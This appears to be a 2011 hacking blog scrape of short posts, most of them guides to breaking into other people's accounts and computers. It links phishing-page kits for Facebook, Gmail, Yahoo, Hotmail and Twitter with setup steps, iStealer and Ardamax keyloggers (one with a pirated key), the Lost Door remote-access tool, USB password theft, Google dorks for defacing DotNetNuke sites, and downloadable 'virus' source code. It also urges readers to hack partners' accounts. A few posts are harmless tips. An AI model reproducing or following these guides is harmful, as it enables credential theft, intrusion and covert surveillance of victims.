Saturday 17 September 2011

Compress 1GB file to 10MB file with KGB Archiver

It is possible to  Compress 1 GB file to 10 MB using KGB ArchiverKGB Archiver , an open source compression tool like 7zip and UHARC with an unbelievably high compression rate .It uses AES-256 encryption (one of the strongest encryption known for man) to encrypt archives . The disappointing thing with KGB Archiver is due to its high compression rate its minimum hardware requirement is high ( recommend processor with 1,5GHz clock and 256MB of RAM ) and compression and decompression process is time consuming.
The latest version KGB archiver 2 BETA 2 has got lot of new features like Multilanguage support (Arabic, German, Greek, Japanese, Polish, Portuguese, Serbian, Spanish, Ukrainian) , Explorer shell extension , 8% faster compression/decompression etc .
kbg

 

Thursday 11 August 2011

How to Hack Facebook/Yahoo/Msn With Istealer keylogger Setup with 000webhost istealer 6.3

iStealer 6.3 Legends [Download] and [Tut]



[Image: is63.PNG]

(07-08-2010 05:24 AM)CATMAN Wrote:  
iStealer 6.3-Pictures-N00b friendly

Downloads

iStealer 6.3 Download

Download From Medaifire:    http://www.mediafire.com/?jku8bwsp5qsqulq

Download it.


Tuesday 9 August 2011

All in One Phisher Fake Page Creator Best tools for phisher maker

This is the best Softwatre to create pishers..
Download it here.


















Monday 8 August 2011

How to Hack Twitter IDs easily using Phishing page / Fake Login page

My first post on Phishing was how to install a phishing page and in order to install a phishing page you need one.So in this article I'll give you a sample of a Twitter phishing page which i made recently.It is quite easily to make a phishing page once you understand the whole idea behind it.




File Details:
Security+ Exam Certification Books)


Download: Phishing Pages ( Twitter Not included )
Note:-Download it from Google your Self. I will include in soon

Download & Hack any Hotmail/Live Email ID using the latest Hotmail Phishing page / Fake Login

My first post on Phishing was how to install a phishing page and in order to install a phishing page you need one.So in this article I'll give you a sample of a Hotmail / Live phishing page which i made recently.It is quite easily to make a phishing page once you understand the whole idea behind it.




File Details:
Download: Phishing Page
Note:-Download it from Google your Self

How to hack Hack Gmail Account -ake Login/Phishing Page for Gmail

My first post on Phishing was how to install a phishing page and in order to install a phishing page you need one.So in this article I'll give you a sample of a Gmail phishing page which i made recently.It is quite easily to make a phishing page once you understand the whole idea behind it.




File Details:
Download: Gmail Phishing Page

How to Hack your Friend's Yahoo ID easily - Phishing Page / Fake Login

My first post on Phishing was how to install a phishing page and in order to install a phishing page you need one.So in this article I'll give you a sample of a Yahoo phishing page which i made recently.It is quite easily to make a phishing page once you understand the whole idea behind it.




File Details:
Download: Yahoo Phishing Page


How to Hack any Facebook account easily by Reverting/Reseting Password of your Victim - No Keylogging,Phishing Required

Here is one more interesting tip on how to hack a Facebook account by the method of reverting the password.This method does not involve any skill or anything just a brain would be enough to get you through this trick ! Well,you might think that it is impossible but it is actually true that you can hack any facebook account ! So before we start i would like to tell you what "Reverting" actually means...





What is Reverting ?

Reverting is the process of resetting a password without the knowledge of the actual user ! So this is basically a low level of hacking but it does the job for you !

For more on reverting go here : What exactly is reverting ?

Sunday 7 August 2011

Hack PC Using Lost Door 4.0/ Remote hacking



1. A Free Account in www.no-ip.com and there you need a free Host.
2. Lost Door Tool
3. May be you need for Microsft Frame Work (Must Install it Mostly Hacking tools did not work without it)
So Here’s The Tutorial:

  • Download Lost Door 
  • Extract the files in your Hard Drive and Accept it
  • After it is open, right click on the window and click on create server



MD5 Decrypter - How to Decrypt MD5 hash, MD5 password

MD5 decrypter to decrypt MD5 password hash.
In this article, I have covered basics of MD5 encryption and decryption and how one can decrypt MD5 hash and MD5 password.





Decrypt MD5 hash, MD5 password:

MD5 is one of most secure password encryption method available today. Actually, MD5 is not encryption, but a hash. Normally, encryption is two-way process ie you can decrypt encrypted password. But, MD5 generates hash and not encryption. And you cannot decrypt hash since hash generation is one-way process and it is not possible to decrypt hash.

Saturday 6 August 2011

Hack any Facebook Account easily using a Phishing page / Fake Login page


In This Tutorial guys i will tell you how to use Facebook Phishing Tool.


Download it here!

What is a Facebook Phishing Page ?
You can go here for more articles on phishing and what it exactly does : What is a Phishing Page ?


How how hack Password of any Pc Throught USB drive/ Flash drive Theft/ Hack Yiour Friends, College or School Pc/ One Mint to Hack All Passwords



Hi Guyz if you have physical access to your victim pc's as you friend if we went out for while then i will tell you how to steal/Hack someone computer passwords through USB Flash Drive.


Protect your Facebook account from hackers with MyPageKeeper Facebook Security Application Security Tips

Facebook users can lean on a new app to help them fight spam and malware.






Designed by a team of students at the University of California at Riverside, MyPageKeeper is a free Facebook app that continually monitors wall posts and news feeds for malicious content. If the app suspects that any content may contain spam or malware, it alerts you and gives you the ability to remove it.

Beyond protecting your own Facebook account, it can also protect the accounts of friends who may get infected by viruses or hit by spam just by viewing your page.


Anti Keylogger / Protect Your Pc From Hackers/ / Pc Security

Anti-keylogger™ is a dedicated anti-keylogging product for Microsoft® Windows® 7/Vista/XP/2000 (32-bit only!) and Microsoft® Windows® Server® 2008/2003 (32-bit only!). It protects computers against information-stealing programs and modules.

Download It HERE!!

How to Hack A Web Site Using SQL Injection- Full Guide

SQL Injection: is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks. (wikipedia definition

What will I need to perform an SQL Injection attack?

Friday 5 August 2011

How to Install / Setup Fake Login Page

You must have come across many fake login pages/scamming pages which are often used to hack IDs.Phishing is the most easiest and the most "unethical way of hacking",Yes that is right phishing is not something great which only a few can do,that is why it makes it unethical.But whatever it might be hacking is hacking and there is obviously a need to know more on this type of exploitation.Before we go into the details let us first see what phishing is all about.

How to Install & Setup a Fake Login Page/Phishing page



What is Phishing ?

Phishing is a way of deceiving your victim by making him login through one of your webpages which is a clone of the original one.By doing so the fake webpage will log his E-mail ID and password.After that he will automatically be redirected to the original webpage making him unsuspicious of what just happened.This is used for criminal activities for stealing Credits Cards and So.And that is the exact reason why i DO NOT want you to use this for fraud.Use this only for educational purposes and not to cause any damage to any person in any way.


First of all you have to get a phishing page.This is available in my blog itself.So download one in advance.

Phishing Pages/Fake login Script Downloads

Thursday 4 August 2011

How to Hack Computer User or Admin Passwords



Here are 2 ways to change passwords on a Windows XP computer if you have forgot or don't

Show Ads
Steps
1.      Know that if you are still logged on to the Administrator account you can change user profiles using the following steps.
o   Go to the green "Start Button" and click "Run" then in the text box type "cmd" without the quotes.
o   Type net user then press enter
o   Then again type "Net user [Username of the Account]*" then press Enter, without the ["], and quotes. Make sure you spell the username correctly, and you have the '*'
o   To change password press enter and after that tieler south * Reset password to what ever you want.

Remove Booting Passwrd Of any Operationg system


Check your motherboard manual for a CMOS reset jumper on the motherboard. Turn the computer off, move the jumper to the re-set postion for a few seconds, replace the jumper from whence it came and re-boot. This will set the BIOS to its defauult state with no password. You will probably get a CMOS Checksum error when you re-boot but this is normal. Reset the CMOS setting to optinal defaults and any other settings you need, save and re-boot.

Gray Hat Hacking The Ethical Hackers Handbook, 3rd EditionSoftware Development Books)


If you cannot find the jumper, remove the battery and leave it out for about twenty minutes with the power of and power cord disconnected. This will do the same thing.





ArdmaX Keylogger 3.0 Tutorial with Registration Key full Detailes Tutorial


Ardamax Keylogger is a keystroke recorder that captures user’s activity and saves it to an encrypted log file. The log file can be viewed with the powerful Log Viewer. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. Also you can use it as a monitoring device for detecting unauthorised access. Logs can be automatically sent to your e-mail address, access to the keylogger is password protected. Besides, Ardamax Keylogger logs information about the Internet addresses the user has visited.
This invisible spy application is designed for 2000, XP, 2003, Vista and Windows 7.
Ardamax Keylogger Registered Version is not Available free on internet, I have purchased a one Download it free below the Serial Key is given in the folder.




I. Get Ardamax
Download:


1. Once you’ve downloaded and installed it, you’ll see a little notepad icon in your taskbar.
1
2.Now right-hand click it and click ‘Enter registration key…’.
2
3.Copy/Paste Registration name and Registration key from Serial. given in archive.


How to Hack an Email Account – Email Hacking

How to Hack an Email Account – Email Hacking

 
Wondering to know how to hack an email account? Well, before you can do that, you need to understand the real ways of hacking that actually work and also that are simply scam and do not work.
So, here in this post, I am going to discuss some of the Real and Working Ways to hack emails; along with that, I am also going to make you aware of the common myths and scams associated with email hacking.
On a regular basis, a lot of people contact me about suspecting their boyfriend or girlfriend of cheating, and ask me how to hack their email password so as to find out the truth. If you are in a similar situation where you want to hack into someone’s email account, then this post might help you!
With my experience  in the field of ethical hacking and computer security, I can tell you that, there exists only 2 foolproof methods to hack emails. All the other methods are simply scam or don’t work.

 Possible Ways to Hack an Email Account

1. Keylogging: The Easiest Way!

Hack Facebook Password – Facebook Hacking

Wondering to know how to hack Facebook password? Well, before you can do that, it is very much necessary to understand the real ways of hacking that actually work and also those that are simply scam and do not work. So in this post, we’ll look at some of the possible ways to hack Facebook password!
Every day I get a lot of emails from people requesting me to hack Facebook passwords of their spouse, girlfriend or boyfriend so as to reveal their secret relationships (if any). Most of them are even willing to pay for the service. However, I strongly deny any such requests since I do not provide any paid hacking service. But anyhow, I have decided to write down this post so that you can learn the tricks for yourself and implement everything at your own risk.
With my experience in the field of ethical hacking and security, all I can tell you is that there are only two ways to successfully hack Facebook password.

Possible Ways to Hack Facebook Password

1. Keylogging – The Easiest Way!

Web Defacing - DNN (Dot Net Nuke)


DNN Hacking Method

  • Find A DNN (Dot Net Nuke) Vulnerable Sites By Google Dorks:
  1. inurl:/tabid/36/language/en-US/Default.aspx
  2. inurl:"/portals/0/"
  3. inurl:tabid/176/Default.aspx
Searh One Of Them In Google,
  • Select the site which you are comfortable with. Its like  http://www.A4Apple.com/Home/tabid/36/Language/en-US/Default.aspx
     OR
     www.B4Ball.com/portals/0/


Phishing Tools/ Fake Logion Pages Available Here



 Tools that can help people potentially defraud innocent surfers are available for free download on the internet, it has been claimed.
The do-it-yourself kits provide all the essential tools for launching phishing attacks - those that use spoofed emails and fraudulent websites to trick people into giving out personal financial data.
Phishing scams are on the up. Security company MessageLabs has intercepted an average of 250,000 phishing emails a month so far in 2004, compared to just 14 phishing-related emails back in August 2003.

Gray Hat Hacking The Ethical Hackers Handbook, 3rd EditionSoftware Development Books)

Program to Restart the Computer at Every Startup





Compiling The Scource Code Into Executable Virus.
1. Download the Source Code Here
2. The downloaded file will be Sysres.C
3. For step-by-step compilation guide, refer my post How to compile C Programs.








Testing And Removing The Virus From Your PC

You can compile and test this virus on your own PC without any fear. To test, just doubleclick the sysres.exe file and restart the system manually. Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by the following steps.

How to Become a Hacker

How to Become a Hacker

Most of us are very curious to learn Hacking and want to become a Hacker, but don’t know where to start. If you are in a samilar situation, then this article will most likely guide you to reach your goal.
On a regular basis, I get a lot of emails where people ask me ”How to Become a Hacker”. In fact, this question is not an easy one to answer, since hacking is not an art that can be mastered overnight. It requires knowledge, skills, creativity, dedication and of course the TIME. Everyone can become a hacker provided they learn it from the basics. So, if you wanna become a hacker, then all you need is a good source of knowledge that will guide you through various concepts of hacking from the basics.


What are Private and Public IP Addresses


Internet Protocol (IP) addresses are usually of two types: Public and Private. If you have ever wondered to know what is the difference between a public and a private IP address, then you are at the right place. In this post I will try to explain the difference between a public and a private IP addres in layman’s terms so that it becomes simple and easy to understand.





What are Public IP Addresses?

A public IP address is assigned to every computer that connects to the Internet where each IP is unique. Hence there cannot exist two computers with the same public IP address all over the Internet. This addressing scheme makes it possible for the computers to “find each other” online and exchange information. User has no control over the IP address (public) that is assigned to the computer. The public IP address is assigned to the computer by the Internet Service Provider as soon as the computer is connected to the Internet gateway.


How to Change the ICON of an EXE file

Some times it becomes necessary to change the ICON of an executable (.exe) file so that the exe file get’s a new appearence. Many of the Tools such as TuneUP Winstyler does this job by adjusting the Windows to display a custom icon to the user. But in reality when the file is carried to a different computer, then it shows it’s original ICON itself. This means that inorder to permanantly change the ICON, it is necessary to modify the executable file and embed the ICON inside the file itself. Now when this is done the exe file’s ICON is changed permanantly so that even if you take file to a different computer it show’s a new icon.
For this purpose I have found a nice tool which modifies the exe file and will embed the ICON of your choice into the file itself. ie: The tool changes the exe ICON permanantly.
I’ll give you a step-by-step instruction on how to use this tool to change the icon.

A Virus Program to Disable USB Ports

In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.
Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.
1. Download the USB_Block.rar file on to your computer.
2. It contains the following 4 files.
  • block_usb.c (source code)
  • unblock_usb.c (source code)

How to Write-Protect USB Flash Drive

Many a time, it becomes necessary for us to write protect our USB flash drive so as to protect it from viruses and other malware programs. Because flash drives are so popular and most widely used to move data between computers, they are the prime target for attackers as a means to get infections spread around the computer world. Also, since USB drive is not a Read-Only Memory (ROM), the data inside it can easily be modified or deleted by malware programs.
But unfortunately, most of the new flash drives do not come with a write-protect feature as the manufacturers wish to cut down the cost of production. Hence, the only way to write-protect your USB flash drives is to enable this feature on your own computer.
This can be done by adding a small entry to the Windows registry which acts as a switch that can be enabled to make use of the write protection or disabled to allow write access. Just follow these steps:
1. Open the Registry Editor (Open the “Run” dialog box, type regedit and hit “Enter”).
2. Navigate to the following Registry key:


How to Download YouTube Videos: Simple Way

YouTube is undoubtedly the most preferred website to share and watch favorite videos. Most users prefer to watch the videos online, while a few others like me, would like to download them so that, they can be saved and retained. Well, if you are one among those few who would like to download the videos from YouTube, then here is a way to do that.
In fact, there are many ways to download videos from YouTube, but here in this post, I would like to share with you one of the easiest way to do that. This can be done as follows:
1. Download and install the latest version of Internet Download Manager.